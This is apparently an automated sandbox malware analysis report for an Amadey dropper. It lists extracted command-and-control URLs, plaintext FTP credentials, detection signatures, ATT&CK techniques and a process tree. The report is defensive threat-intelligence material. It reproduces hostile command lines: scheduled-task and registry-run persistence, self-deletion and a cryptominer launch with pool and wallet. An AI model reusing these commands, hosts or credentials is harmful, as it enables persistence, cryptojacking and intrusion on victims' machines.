amadey | 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

Resubmissions

29-01-2024 12:19

240129-phancababl 10

12-01-2024 23:12

240112-268aqsfgap 10

Analysis

max time kernel
13s
max time network
305s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
29-01-2024 12:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Credentials

Protocol: ftp
Host:
162.248.54.77
Port:
21
Username:
appftp
Password:
$ftp365284$

Extracted

Family

smokeloader

Botnet

lab

Extracted

Family

smokeloader

Version

2020

http://host-file-host6.com/

http://host-host-file8.com/

rc4.i32

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/shell_reverse_tcp

127.0.0.1:12346

Extracted

Family

amadey

Version

3.86

http://45.9.74.182

Attributes

install_dir
f3f10bd848
install_file
bstyoops.exe
strings_key
05986a1cda6dc6caabf469f27fb6c32d
url_paths
/b7djSDcPcZ/index.php

rc4.plain

Extracted

Family

stealc

http://185.172.128.24

Attributes

url_path
/40d570f44e84a454.php

rc4.plain

Extracted

Family

risepro

185.149.146.75:50500

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect Lumma Stealer payload V2 1 IoCs

resource	yara_rule
behavioral3/files/0x00050000000162b5-2323.dat	family_lumma_V2

Detect Lumma Stealer payload V4 1 IoCs

resource	yara_rule
behavioral3/files/0x00050000000162b5-2323.dat	family_lumma_v4

Detect ZGRat V1 2 IoCs

resource	yara_rule
behavioral3/memory/2908-24-0x00000000002B0000-0x000000000030A000-memory.dmp	family_zgrat_v1
behavioral3/files/0x000700000002370a-1478.dat	family_zgrat_v1

Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral3/files/0x000600000002327e-672.dat	family_quasar

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 4 IoCs

resource	yara_rule
behavioral3/memory/4440-211-0x00000000023C0000-0x0000000002402000-memory.dmp	family_redline
behavioral3/memory/4440-220-0x0000000004FE0000-0x000000000501E000-memory.dmp	family_redline
behavioral3/files/0x00060000000236d3-1191.dat	family_redline
behavioral3/files/0x00060000000236fe-1455.dat	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Stealc
Stealc is an infostealer written in C++.
stealer stealc

XMRig Miner payload 8 IoCs

miner

resource	yara_rule
behavioral3/memory/2288-490-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral3/memory/2288-498-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral3/memory/2288-500-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral3/memory/2288-504-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral3/memory/2288-506-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral3/memory/2288-507-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral3/files/0x00060000000236f1-1407.dat	family_xmrig
behavioral3/files/0x00060000000236f1-1407.dat	xmrig

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
5584	netsh.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

.NET Reactor proctector 7 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral3/files/0x0007000000023212-99.dat	net_reactor
behavioral3/files/0x0007000000023212-104.dat	net_reactor
behavioral3/files/0x0007000000023212-109.dat	net_reactor
behavioral3/memory/3172-111-0x0000000000C70000-0x0000000001036000-memory.dmp	net_reactor
behavioral3/files/0x000700000002321b-238.dat	net_reactor
behavioral3/files/0x000700000002321b-239.dat	net_reactor
behavioral3/files/0x000b000000023738-1958.dat	net_reactor

ACProtect 1.3x - 1.4x DLL software 1 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral3/files/0x0006000000023733-1777.dat	acprotect

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
Key value queried	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation	flesh.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe	flesh.exe

Executes dropped EXE 10 IoCs

pid	Process
2924	865b3db67f0565e0b41e72aa036d78183c33dab95bd4be7b4f13aebda88ab0c0.exe
2908	flesh.exe
460	865b3db67f0565e0b41e72aa036d78183c33dab95bd4be7b4f13aebda88ab0c0.exe
3960	laplas03.exe
3592	12cc22da6901d5fc26e8f2d3ee79a1c346f83a7ae43e25d1384e1df23d9adb69.exe
2996	360TS_Setup_Mini_WW.Ginmobi.CPI202401_6.6.0.1060.exe
3172	Conhost.exe
4872	Conhost.exe
3468	qemu-ga.exe
1092	Conhost.exe

Loads dropped DLL 1 IoCs

pid	Process
2996	360TS_Setup_Mini_WW.Ginmobi.CPI202401_6.6.0.1060.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 1 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral3/files/0x000d00000001d88c-2358.dat	themida

UPX packed file 18 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral3/files/0x000600000002320b-50.dat	upx
behavioral3/files/0x000600000002320b-52.dat	upx
behavioral3/files/0x000600000002320b-53.dat	upx
behavioral3/memory/3960-54-0x0000000000440000-0x000000000129E000-memory.dmp	upx
behavioral3/memory/3960-66-0x0000000000440000-0x000000000129E000-memory.dmp	upx
behavioral3/memory/2288-480-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral3/memory/2288-486-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral3/memory/2288-482-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral3/memory/2288-490-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral3/memory/2288-498-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral3/memory/2288-500-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral3/memory/2288-504-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral3/memory/2288-506-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral3/memory/2288-507-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral3/files/0x0005000000000711-985.dat	upx
behavioral3/files/0x0010000000023723-1745.dat	upx
behavioral3/files/0x0006000000023733-1777.dat	upx
behavioral3/files/0x000500000001da8c-2371.dat	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

VMProtect packed file 1 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral3/files/0x000300000001e4d4-2391.dat	vmprotect

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 45 IoCs

Web Service

T1102

flow	ioc
353	bitbucket.org
361	raw.githubusercontent.com
13	raw.githubusercontent.com
314	discord.com
325	discord.com
340	discord.com
329	discord.com
338	discord.com
341	discord.com
15	raw.githubusercontent.com
194	bitbucket.org
310	discord.com
311	discord.com
290	discord.com
302	discord.com
323	discord.com
326	discord.com
175	bitbucket.org
293	discord.com
304	discord.com
303	discord.com
339	discord.com
134	bitbucket.org
176	bitbucket.org
195	bitbucket.org
294	discord.com
313	discord.com
324	discord.com
335	discord.com
135	bitbucket.org
296	discord.com
308	discord.com
309	discord.com
337	discord.com
354	bitbucket.org
362	raw.githubusercontent.com
315	discord.com
331	discord.com
334	discord.com
336	discord.com
330	discord.com
291	discord.com
295	discord.com
312	discord.com
328	discord.com

Looks up external IP address via web service 10 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
270	ipinfo.io
284	api.ipify.org
146	ipinfo.io
147	ipinfo.io
285	api.ipify.org
306	api.ipify.org
321	api.ipify.org
332	api.ipify.org
137	ip-api.com
271	ipinfo.io

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	360TS_Setup_Mini_WW.Ginmobi.CPI202401_6.6.0.1060.exe

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral3/files/0x0009000000023706-1555.dat	autoit_exe
behavioral3/files/0x0013000000023732-1943.dat	autoit_exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2924 set thread context of 460	2924	865b3db67f0565e0b41e72aa036d78183c33dab95bd4be7b4f13aebda88ab0c0.exe	90
PID 3592 set thread context of 1092	3592	0JkaV6niHi_GoqhPSmbi.exe	529

Launches sc.exe 27 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3592	sc.exe
6048	sc.exe
184	sc.exe
6124	sc.exe
5944	sc.exe
1184	sc.exe
5520	sc.exe
5628	sc.exe
5656	sc.exe
1720	sc.exe
1212	sc.exe
1336	sc.exe
5232	sc.exe
3328	sc.exe
1660	sc.exe
3564	sc.exe
5200	sc.exe
5336	sc.exe
5600	sc.exe
1456	sc.exe
5504	sc.exe
5580	sc.exe
5548	sc.exe
400	sc.exe
3108	sc.exe
1800	sc.exe
5960	sc.exe

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral3/files/0x0003000000000741-1025.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 41 IoCs

pid	pid_target	Process	procid_target
3928	904	WerFault.exe	116
4296	1664	WerFault.exe	115
1396	2732	WerFault.exe	132
5104	3368	WerFault.exe	130
2060	4548	WerFault.exe	187
3180	3096	WerFault.exe	201
3184	3096	WerFault.exe	201
1476	4588	WerFault.exe	206
4672	3096	WerFault.exe	201
4572	3096	WerFault.exe	201
4300	3096	WerFault.exe	201
2520	3096	WerFault.exe	201
756	3096	WerFault.exe	201
1376	3096	WerFault.exe	201
5468	3096	WerFault.exe	201
5716	3096	WerFault.exe	201
5992	3096	WerFault.exe	201
6116	3096	WerFault.exe	201
3960	3096	WerFault.exe	201
4552	3096	WerFault.exe	201
1532	3096	WerFault.exe	201
5272	3096	WerFault.exe	201
4108	3096	WerFault.exe	201
3644	3096	WerFault.exe	201
4732	3096	WerFault.exe	201
2576	5320	WerFault.exe	325
5096	5320	WerFault.exe	325
5296	5320	WerFault.exe	325
5480	5320	WerFault.exe	325
5576	5320	WerFault.exe	325
3912	5320	WerFault.exe	325
4636	5320	WerFault.exe	325
3620	5320	WerFault.exe	325
2564	5320	WerFault.exe	325
1072	3940	WerFault.exe	386
2604	3108	WerFault.exe	428
3028	5320	WerFault.exe	325
5784	5320	WerFault.exe	325
3028	5320	WerFault.exe	325
5420	1260	WerFault.exe	463
2024	4868	WerFault.exe	155

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral3/files/0x00050000000162de-2331.dat	nsis_installer_1
behavioral3/files/0x00050000000162de-2331.dat	nsis_installer_2

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	865b3db67f0565e0b41e72aa036d78183c33dab95bd4be7b4f13aebda88ab0c0.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	865b3db67f0565e0b41e72aa036d78183c33dab95bd4be7b4f13aebda88ab0c0.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	865b3db67f0565e0b41e72aa036d78183c33dab95bd4be7b4f13aebda88ab0c0.exe

Creates scheduled task(s) 1 TTPs 8 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4212	schtasks.exe
3636	schtasks.exe
5828	schtasks.exe
2296	schtasks.exe
6048	SCHTASKS.exe
4396	schtasks.exe
1172	schtasks.exe
3404	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1956	timeout.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
4016	tasklist.exe

Kills process with taskkill 7 IoCs

evasion

pid	Process
3460	taskkill.exe
3600	taskkill.exe
4324	taskkill.exe
3928	taskkill.exe
2912	taskkill.exe
3816	taskkill.exe
3892	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
5520	reg.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
5532	PING.EXE
2024	PING.EXE
6056	PING.EXE

Suspicious behavior: EnumeratesProcesses 15 IoCs

pid	Process
460	865b3db67f0565e0b41e72aa036d78183c33dab95bd4be7b4f13aebda88ab0c0.exe
460	865b3db67f0565e0b41e72aa036d78183c33dab95bd4be7b4f13aebda88ab0c0.exe
2908	flesh.exe
3428	Process not Found
3428	Process not Found
3428	Process not Found
3428	Process not Found
3428	Process not Found
3428	Process not Found
3428	Process not Found
3428	Process not Found
3428	Process not Found
3428	Process not Found
3428	Process not Found
3428	Process not Found

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
460	865b3db67f0565e0b41e72aa036d78183c33dab95bd4be7b4f13aebda88ab0c0.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	1116	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
Token: SeDebugPrivilege	2908	flesh.exe
Token: SeManageVolumePrivilege	2996	360TS_Setup_Mini_WW.Ginmobi.CPI202401_6.6.0.1060.exe
Token: SeDebugPrivilege	3172	Conhost.exe
Token: SeShutdownPrivilege	3428	Process not Found
Token: SeCreatePagefilePrivilege	3428	Process not Found
Token: SeShutdownPrivilege	3428	Process not Found
Token: SeCreatePagefilePrivilege	3428	Process not Found
Token: SeShutdownPrivilege	3428	Process not Found
Token: SeCreatePagefilePrivilege	3428	Process not Found

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2996	360TS_Setup_Mini_WW.Ginmobi.CPI202401_6.6.0.1060.exe
2996	360TS_Setup_Mini_WW.Ginmobi.CPI202401_6.6.0.1060.exe

Suspicious use of SendNotifyMessage 2 IoCs

pid	Process
2996	360TS_Setup_Mini_WW.Ginmobi.CPI202401_6.6.0.1060.exe
2996	360TS_Setup_Mini_WW.Ginmobi.CPI202401_6.6.0.1060.exe

Suspicious use of WriteProcessMemory 39 IoCs

description	pid	Process	procid_target
PID 1116 wrote to memory of 2924	1116	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe	85
PID 1116 wrote to memory of 2924	1116	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe	85
PID 1116 wrote to memory of 2924	1116	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe	85
PID 1116 wrote to memory of 2908	1116	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe	86
PID 1116 wrote to memory of 2908	1116	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe	86
PID 1116 wrote to memory of 2908	1116	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe	86
PID 2924 wrote to memory of 460	2924	865b3db67f0565e0b41e72aa036d78183c33dab95bd4be7b4f13aebda88ab0c0.exe	90
PID 2924 wrote to memory of 460	2924	865b3db67f0565e0b41e72aa036d78183c33dab95bd4be7b4f13aebda88ab0c0.exe	90
PID 2924 wrote to memory of 460	2924	865b3db67f0565e0b41e72aa036d78183c33dab95bd4be7b4f13aebda88ab0c0.exe	90
PID 2924 wrote to memory of 460	2924	865b3db67f0565e0b41e72aa036d78183c33dab95bd4be7b4f13aebda88ab0c0.exe	90
PID 2924 wrote to memory of 460	2924	865b3db67f0565e0b41e72aa036d78183c33dab95bd4be7b4f13aebda88ab0c0.exe	90
PID 2924 wrote to memory of 460	2924	865b3db67f0565e0b41e72aa036d78183c33dab95bd4be7b4f13aebda88ab0c0.exe	90
PID 1116 wrote to memory of 3960	1116	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe	91
PID 1116 wrote to memory of 3960	1116	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe	91
PID 1116 wrote to memory of 3592	1116	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe	93
PID 1116 wrote to memory of 3592	1116	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe	93
PID 1116 wrote to memory of 3592	1116	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe	93
PID 3960 wrote to memory of 1804	3960	WerFault.exe	295
PID 3960 wrote to memory of 1804	3960	WerFault.exe	295
PID 1804 wrote to memory of 4908	1804	powershell.exe	96
PID 1804 wrote to memory of 4908	1804	powershell.exe	96
PID 1116 wrote to memory of 2996	1116	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe	97
PID 1116 wrote to memory of 2996	1116	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe	97
PID 1116 wrote to memory of 2996	1116	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe	97
PID 1116 wrote to memory of 3172	1116	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe	238
PID 1116 wrote to memory of 3172	1116	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe	238
PID 1116 wrote to memory of 4872	1116	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe	244
PID 1116 wrote to memory of 4872	1116	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe	244
PID 1116 wrote to memory of 4872	1116	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe	244
PID 2908 wrote to memory of 3468	2908	flesh.exe	100
PID 2908 wrote to memory of 3468	2908	flesh.exe	100
PID 3172 wrote to memory of 3436	3172	Conhost.exe	104
PID 3172 wrote to memory of 3436	3172	Conhost.exe	104
PID 3592 wrote to memory of 1092	3592	0JkaV6niHi_GoqhPSmbi.exe	529
PID 3592 wrote to memory of 1092	3592	0JkaV6niHi_GoqhPSmbi.exe	529
PID 3592 wrote to memory of 1092	3592	0JkaV6niHi_GoqhPSmbi.exe	529
PID 3592 wrote to memory of 1092	3592	0JkaV6niHi_GoqhPSmbi.exe	529
PID 3592 wrote to memory of 1092	3592	0JkaV6niHi_GoqhPSmbi.exe	529
PID 3592 wrote to memory of 1092	3592	0JkaV6niHi_GoqhPSmbi.exe	529

C:\Users\Admin\AppData\Local\Temp\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\AppData\Local\Temp\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1116
- C:\Users\Admin\AppData\Local\Temp\Files\865b3db67f0565e0b41e72aa036d78183c33dab95bd4be7b4f13aebda88ab0c0.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\865b3db67f0565e0b41e72aa036d78183c33dab95bd4be7b4f13aebda88ab0c0.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:2924
- - C:\Users\Admin\AppData\Local\Temp\Files\865b3db67f0565e0b41e72aa036d78183c33dab95bd4be7b4f13aebda88ab0c0.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\865b3db67f0565e0b41e72aa036d78183c33dab95bd4be7b4f13aebda88ab0c0.exe"
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    PID:460
- C:\Users\Admin\AppData\Local\Temp\Files\flesh.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\flesh.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2908
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"
    3⤵
    - Executes dropped EXE
    PID:3468
- C:\Users\Admin\AppData\Local\Temp\Files\laplas03.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\laplas03.exe"
  2⤵
  - Executes dropped EXE
  PID:3960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\Files\laplas03.exe
    3⤵
    PID:1804
  - - C:\Windows\system32\choice.exe
      choice /C Y /N /D Y /T 0
      4⤵
      PID:4908
- C:\Users\Admin\AppData\Local\Temp\Files\12cc22da6901d5fc26e8f2d3ee79a1c346f83a7ae43e25d1384e1df23d9adb69.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\12cc22da6901d5fc26e8f2d3ee79a1c346f83a7ae43e25d1384e1df23d9adb69.exe"
  2⤵
  - Executes dropped EXE
  PID:3592
- - C:\Users\Admin\AppData\Local\Temp\Files\12cc22da6901d5fc26e8f2d3ee79a1c346f83a7ae43e25d1384e1df23d9adb69.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\12cc22da6901d5fc26e8f2d3ee79a1c346f83a7ae43e25d1384e1df23d9adb69.exe"
    3⤵
    PID:1092
- C:\Users\Admin\AppData\Local\Temp\Files\360TS_Setup_Mini_WW.Ginmobi.CPI202401_6.6.0.1060.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\360TS_Setup_Mini_WW.Ginmobi.CPI202401_6.6.0.1060.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Writes to the Master Boot Record (MBR)
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:2996
- - C:\Users\Admin\AppData\Local\Temp\Files\360TS_Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\360TS_Setup.exe" /c:WW.Ginmobi.CPI202401 /pmode:2 /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo=
    3⤵
    PID:4696
  - - C:\Program Files (x86)\1706530804_0\360TS_Setup.exe
      "C:\Program Files (x86)\1706530804_0\360TS_Setup.exe" /c:WW.Ginmobi.CPI202401 /pmode:2 /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall
      4⤵
      PID:3620
- C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"
  2⤵
  PID:3172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9B36.tmp.bat""
    3⤵
    PID:3436
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:1956
  - - C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
      "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
      4⤵
      PID:1016
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        5⤵
        
        PID:876
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        6⤵
        Creates scheduled task(s)
        
        PID:1172
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
        5⤵
        
        PID:2288
- C:\Users\Admin\AppData\Local\Temp\Files\3b9da1066d77143b24ee1c9b9c9787f63400bc599fcaf4bfc8f58efc802cf760.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\3b9da1066d77143b24ee1c9b9c9787f63400bc599fcaf4bfc8f58efc802cf760.exe"
  2⤵
  PID:4872
- - C:\Users\Admin\AppData\Local\Temp\Files\3b9da1066d77143b24ee1c9b9c9787f63400bc599fcaf4bfc8f58efc802cf760.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\3b9da1066d77143b24ee1c9b9c9787f63400bc599fcaf4bfc8f58efc802cf760.exe"
    3⤵
    PID:4844
- C:\Users\Admin\AppData\Local\Temp\Files\BelgiumchainAGRO.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\BelgiumchainAGRO.exe"
  2⤵
  PID:3344
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
    3⤵
    PID:1104
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'BelgiumchainAGRO';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'BelgiumchainAGRO' -Value '"C:\Users\Admin\AppData\Local\BelgiumchainAGRO\BelgiumchainAGRO.exe"' -PropertyType 'String'
    3⤵
    PID:4016
- C:\Users\Admin\AppData\Local\Temp\Files\leg221.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\leg221.exe"
  2⤵
  PID:4440
- C:\Users\Admin\AppData\Local\Temp\Files\cs_maltest.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\cs_maltest.exe"
  2⤵
  PID:2068
- C:\Users\Admin\AppData\Local\Temp\Files\TaAgente.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\TaAgente.exe"
  2⤵
  PID:1664
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1664 -s 1764
    3⤵
    - Program crash
    PID:4296
- C:\Users\Admin\AppData\Local\Temp\Files\tidex_-_short_stuff.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\tidex_-_short_stuff.exe"
  2⤵
  PID:904
- - C:\Windows\SysWOW64\WerFault.exe
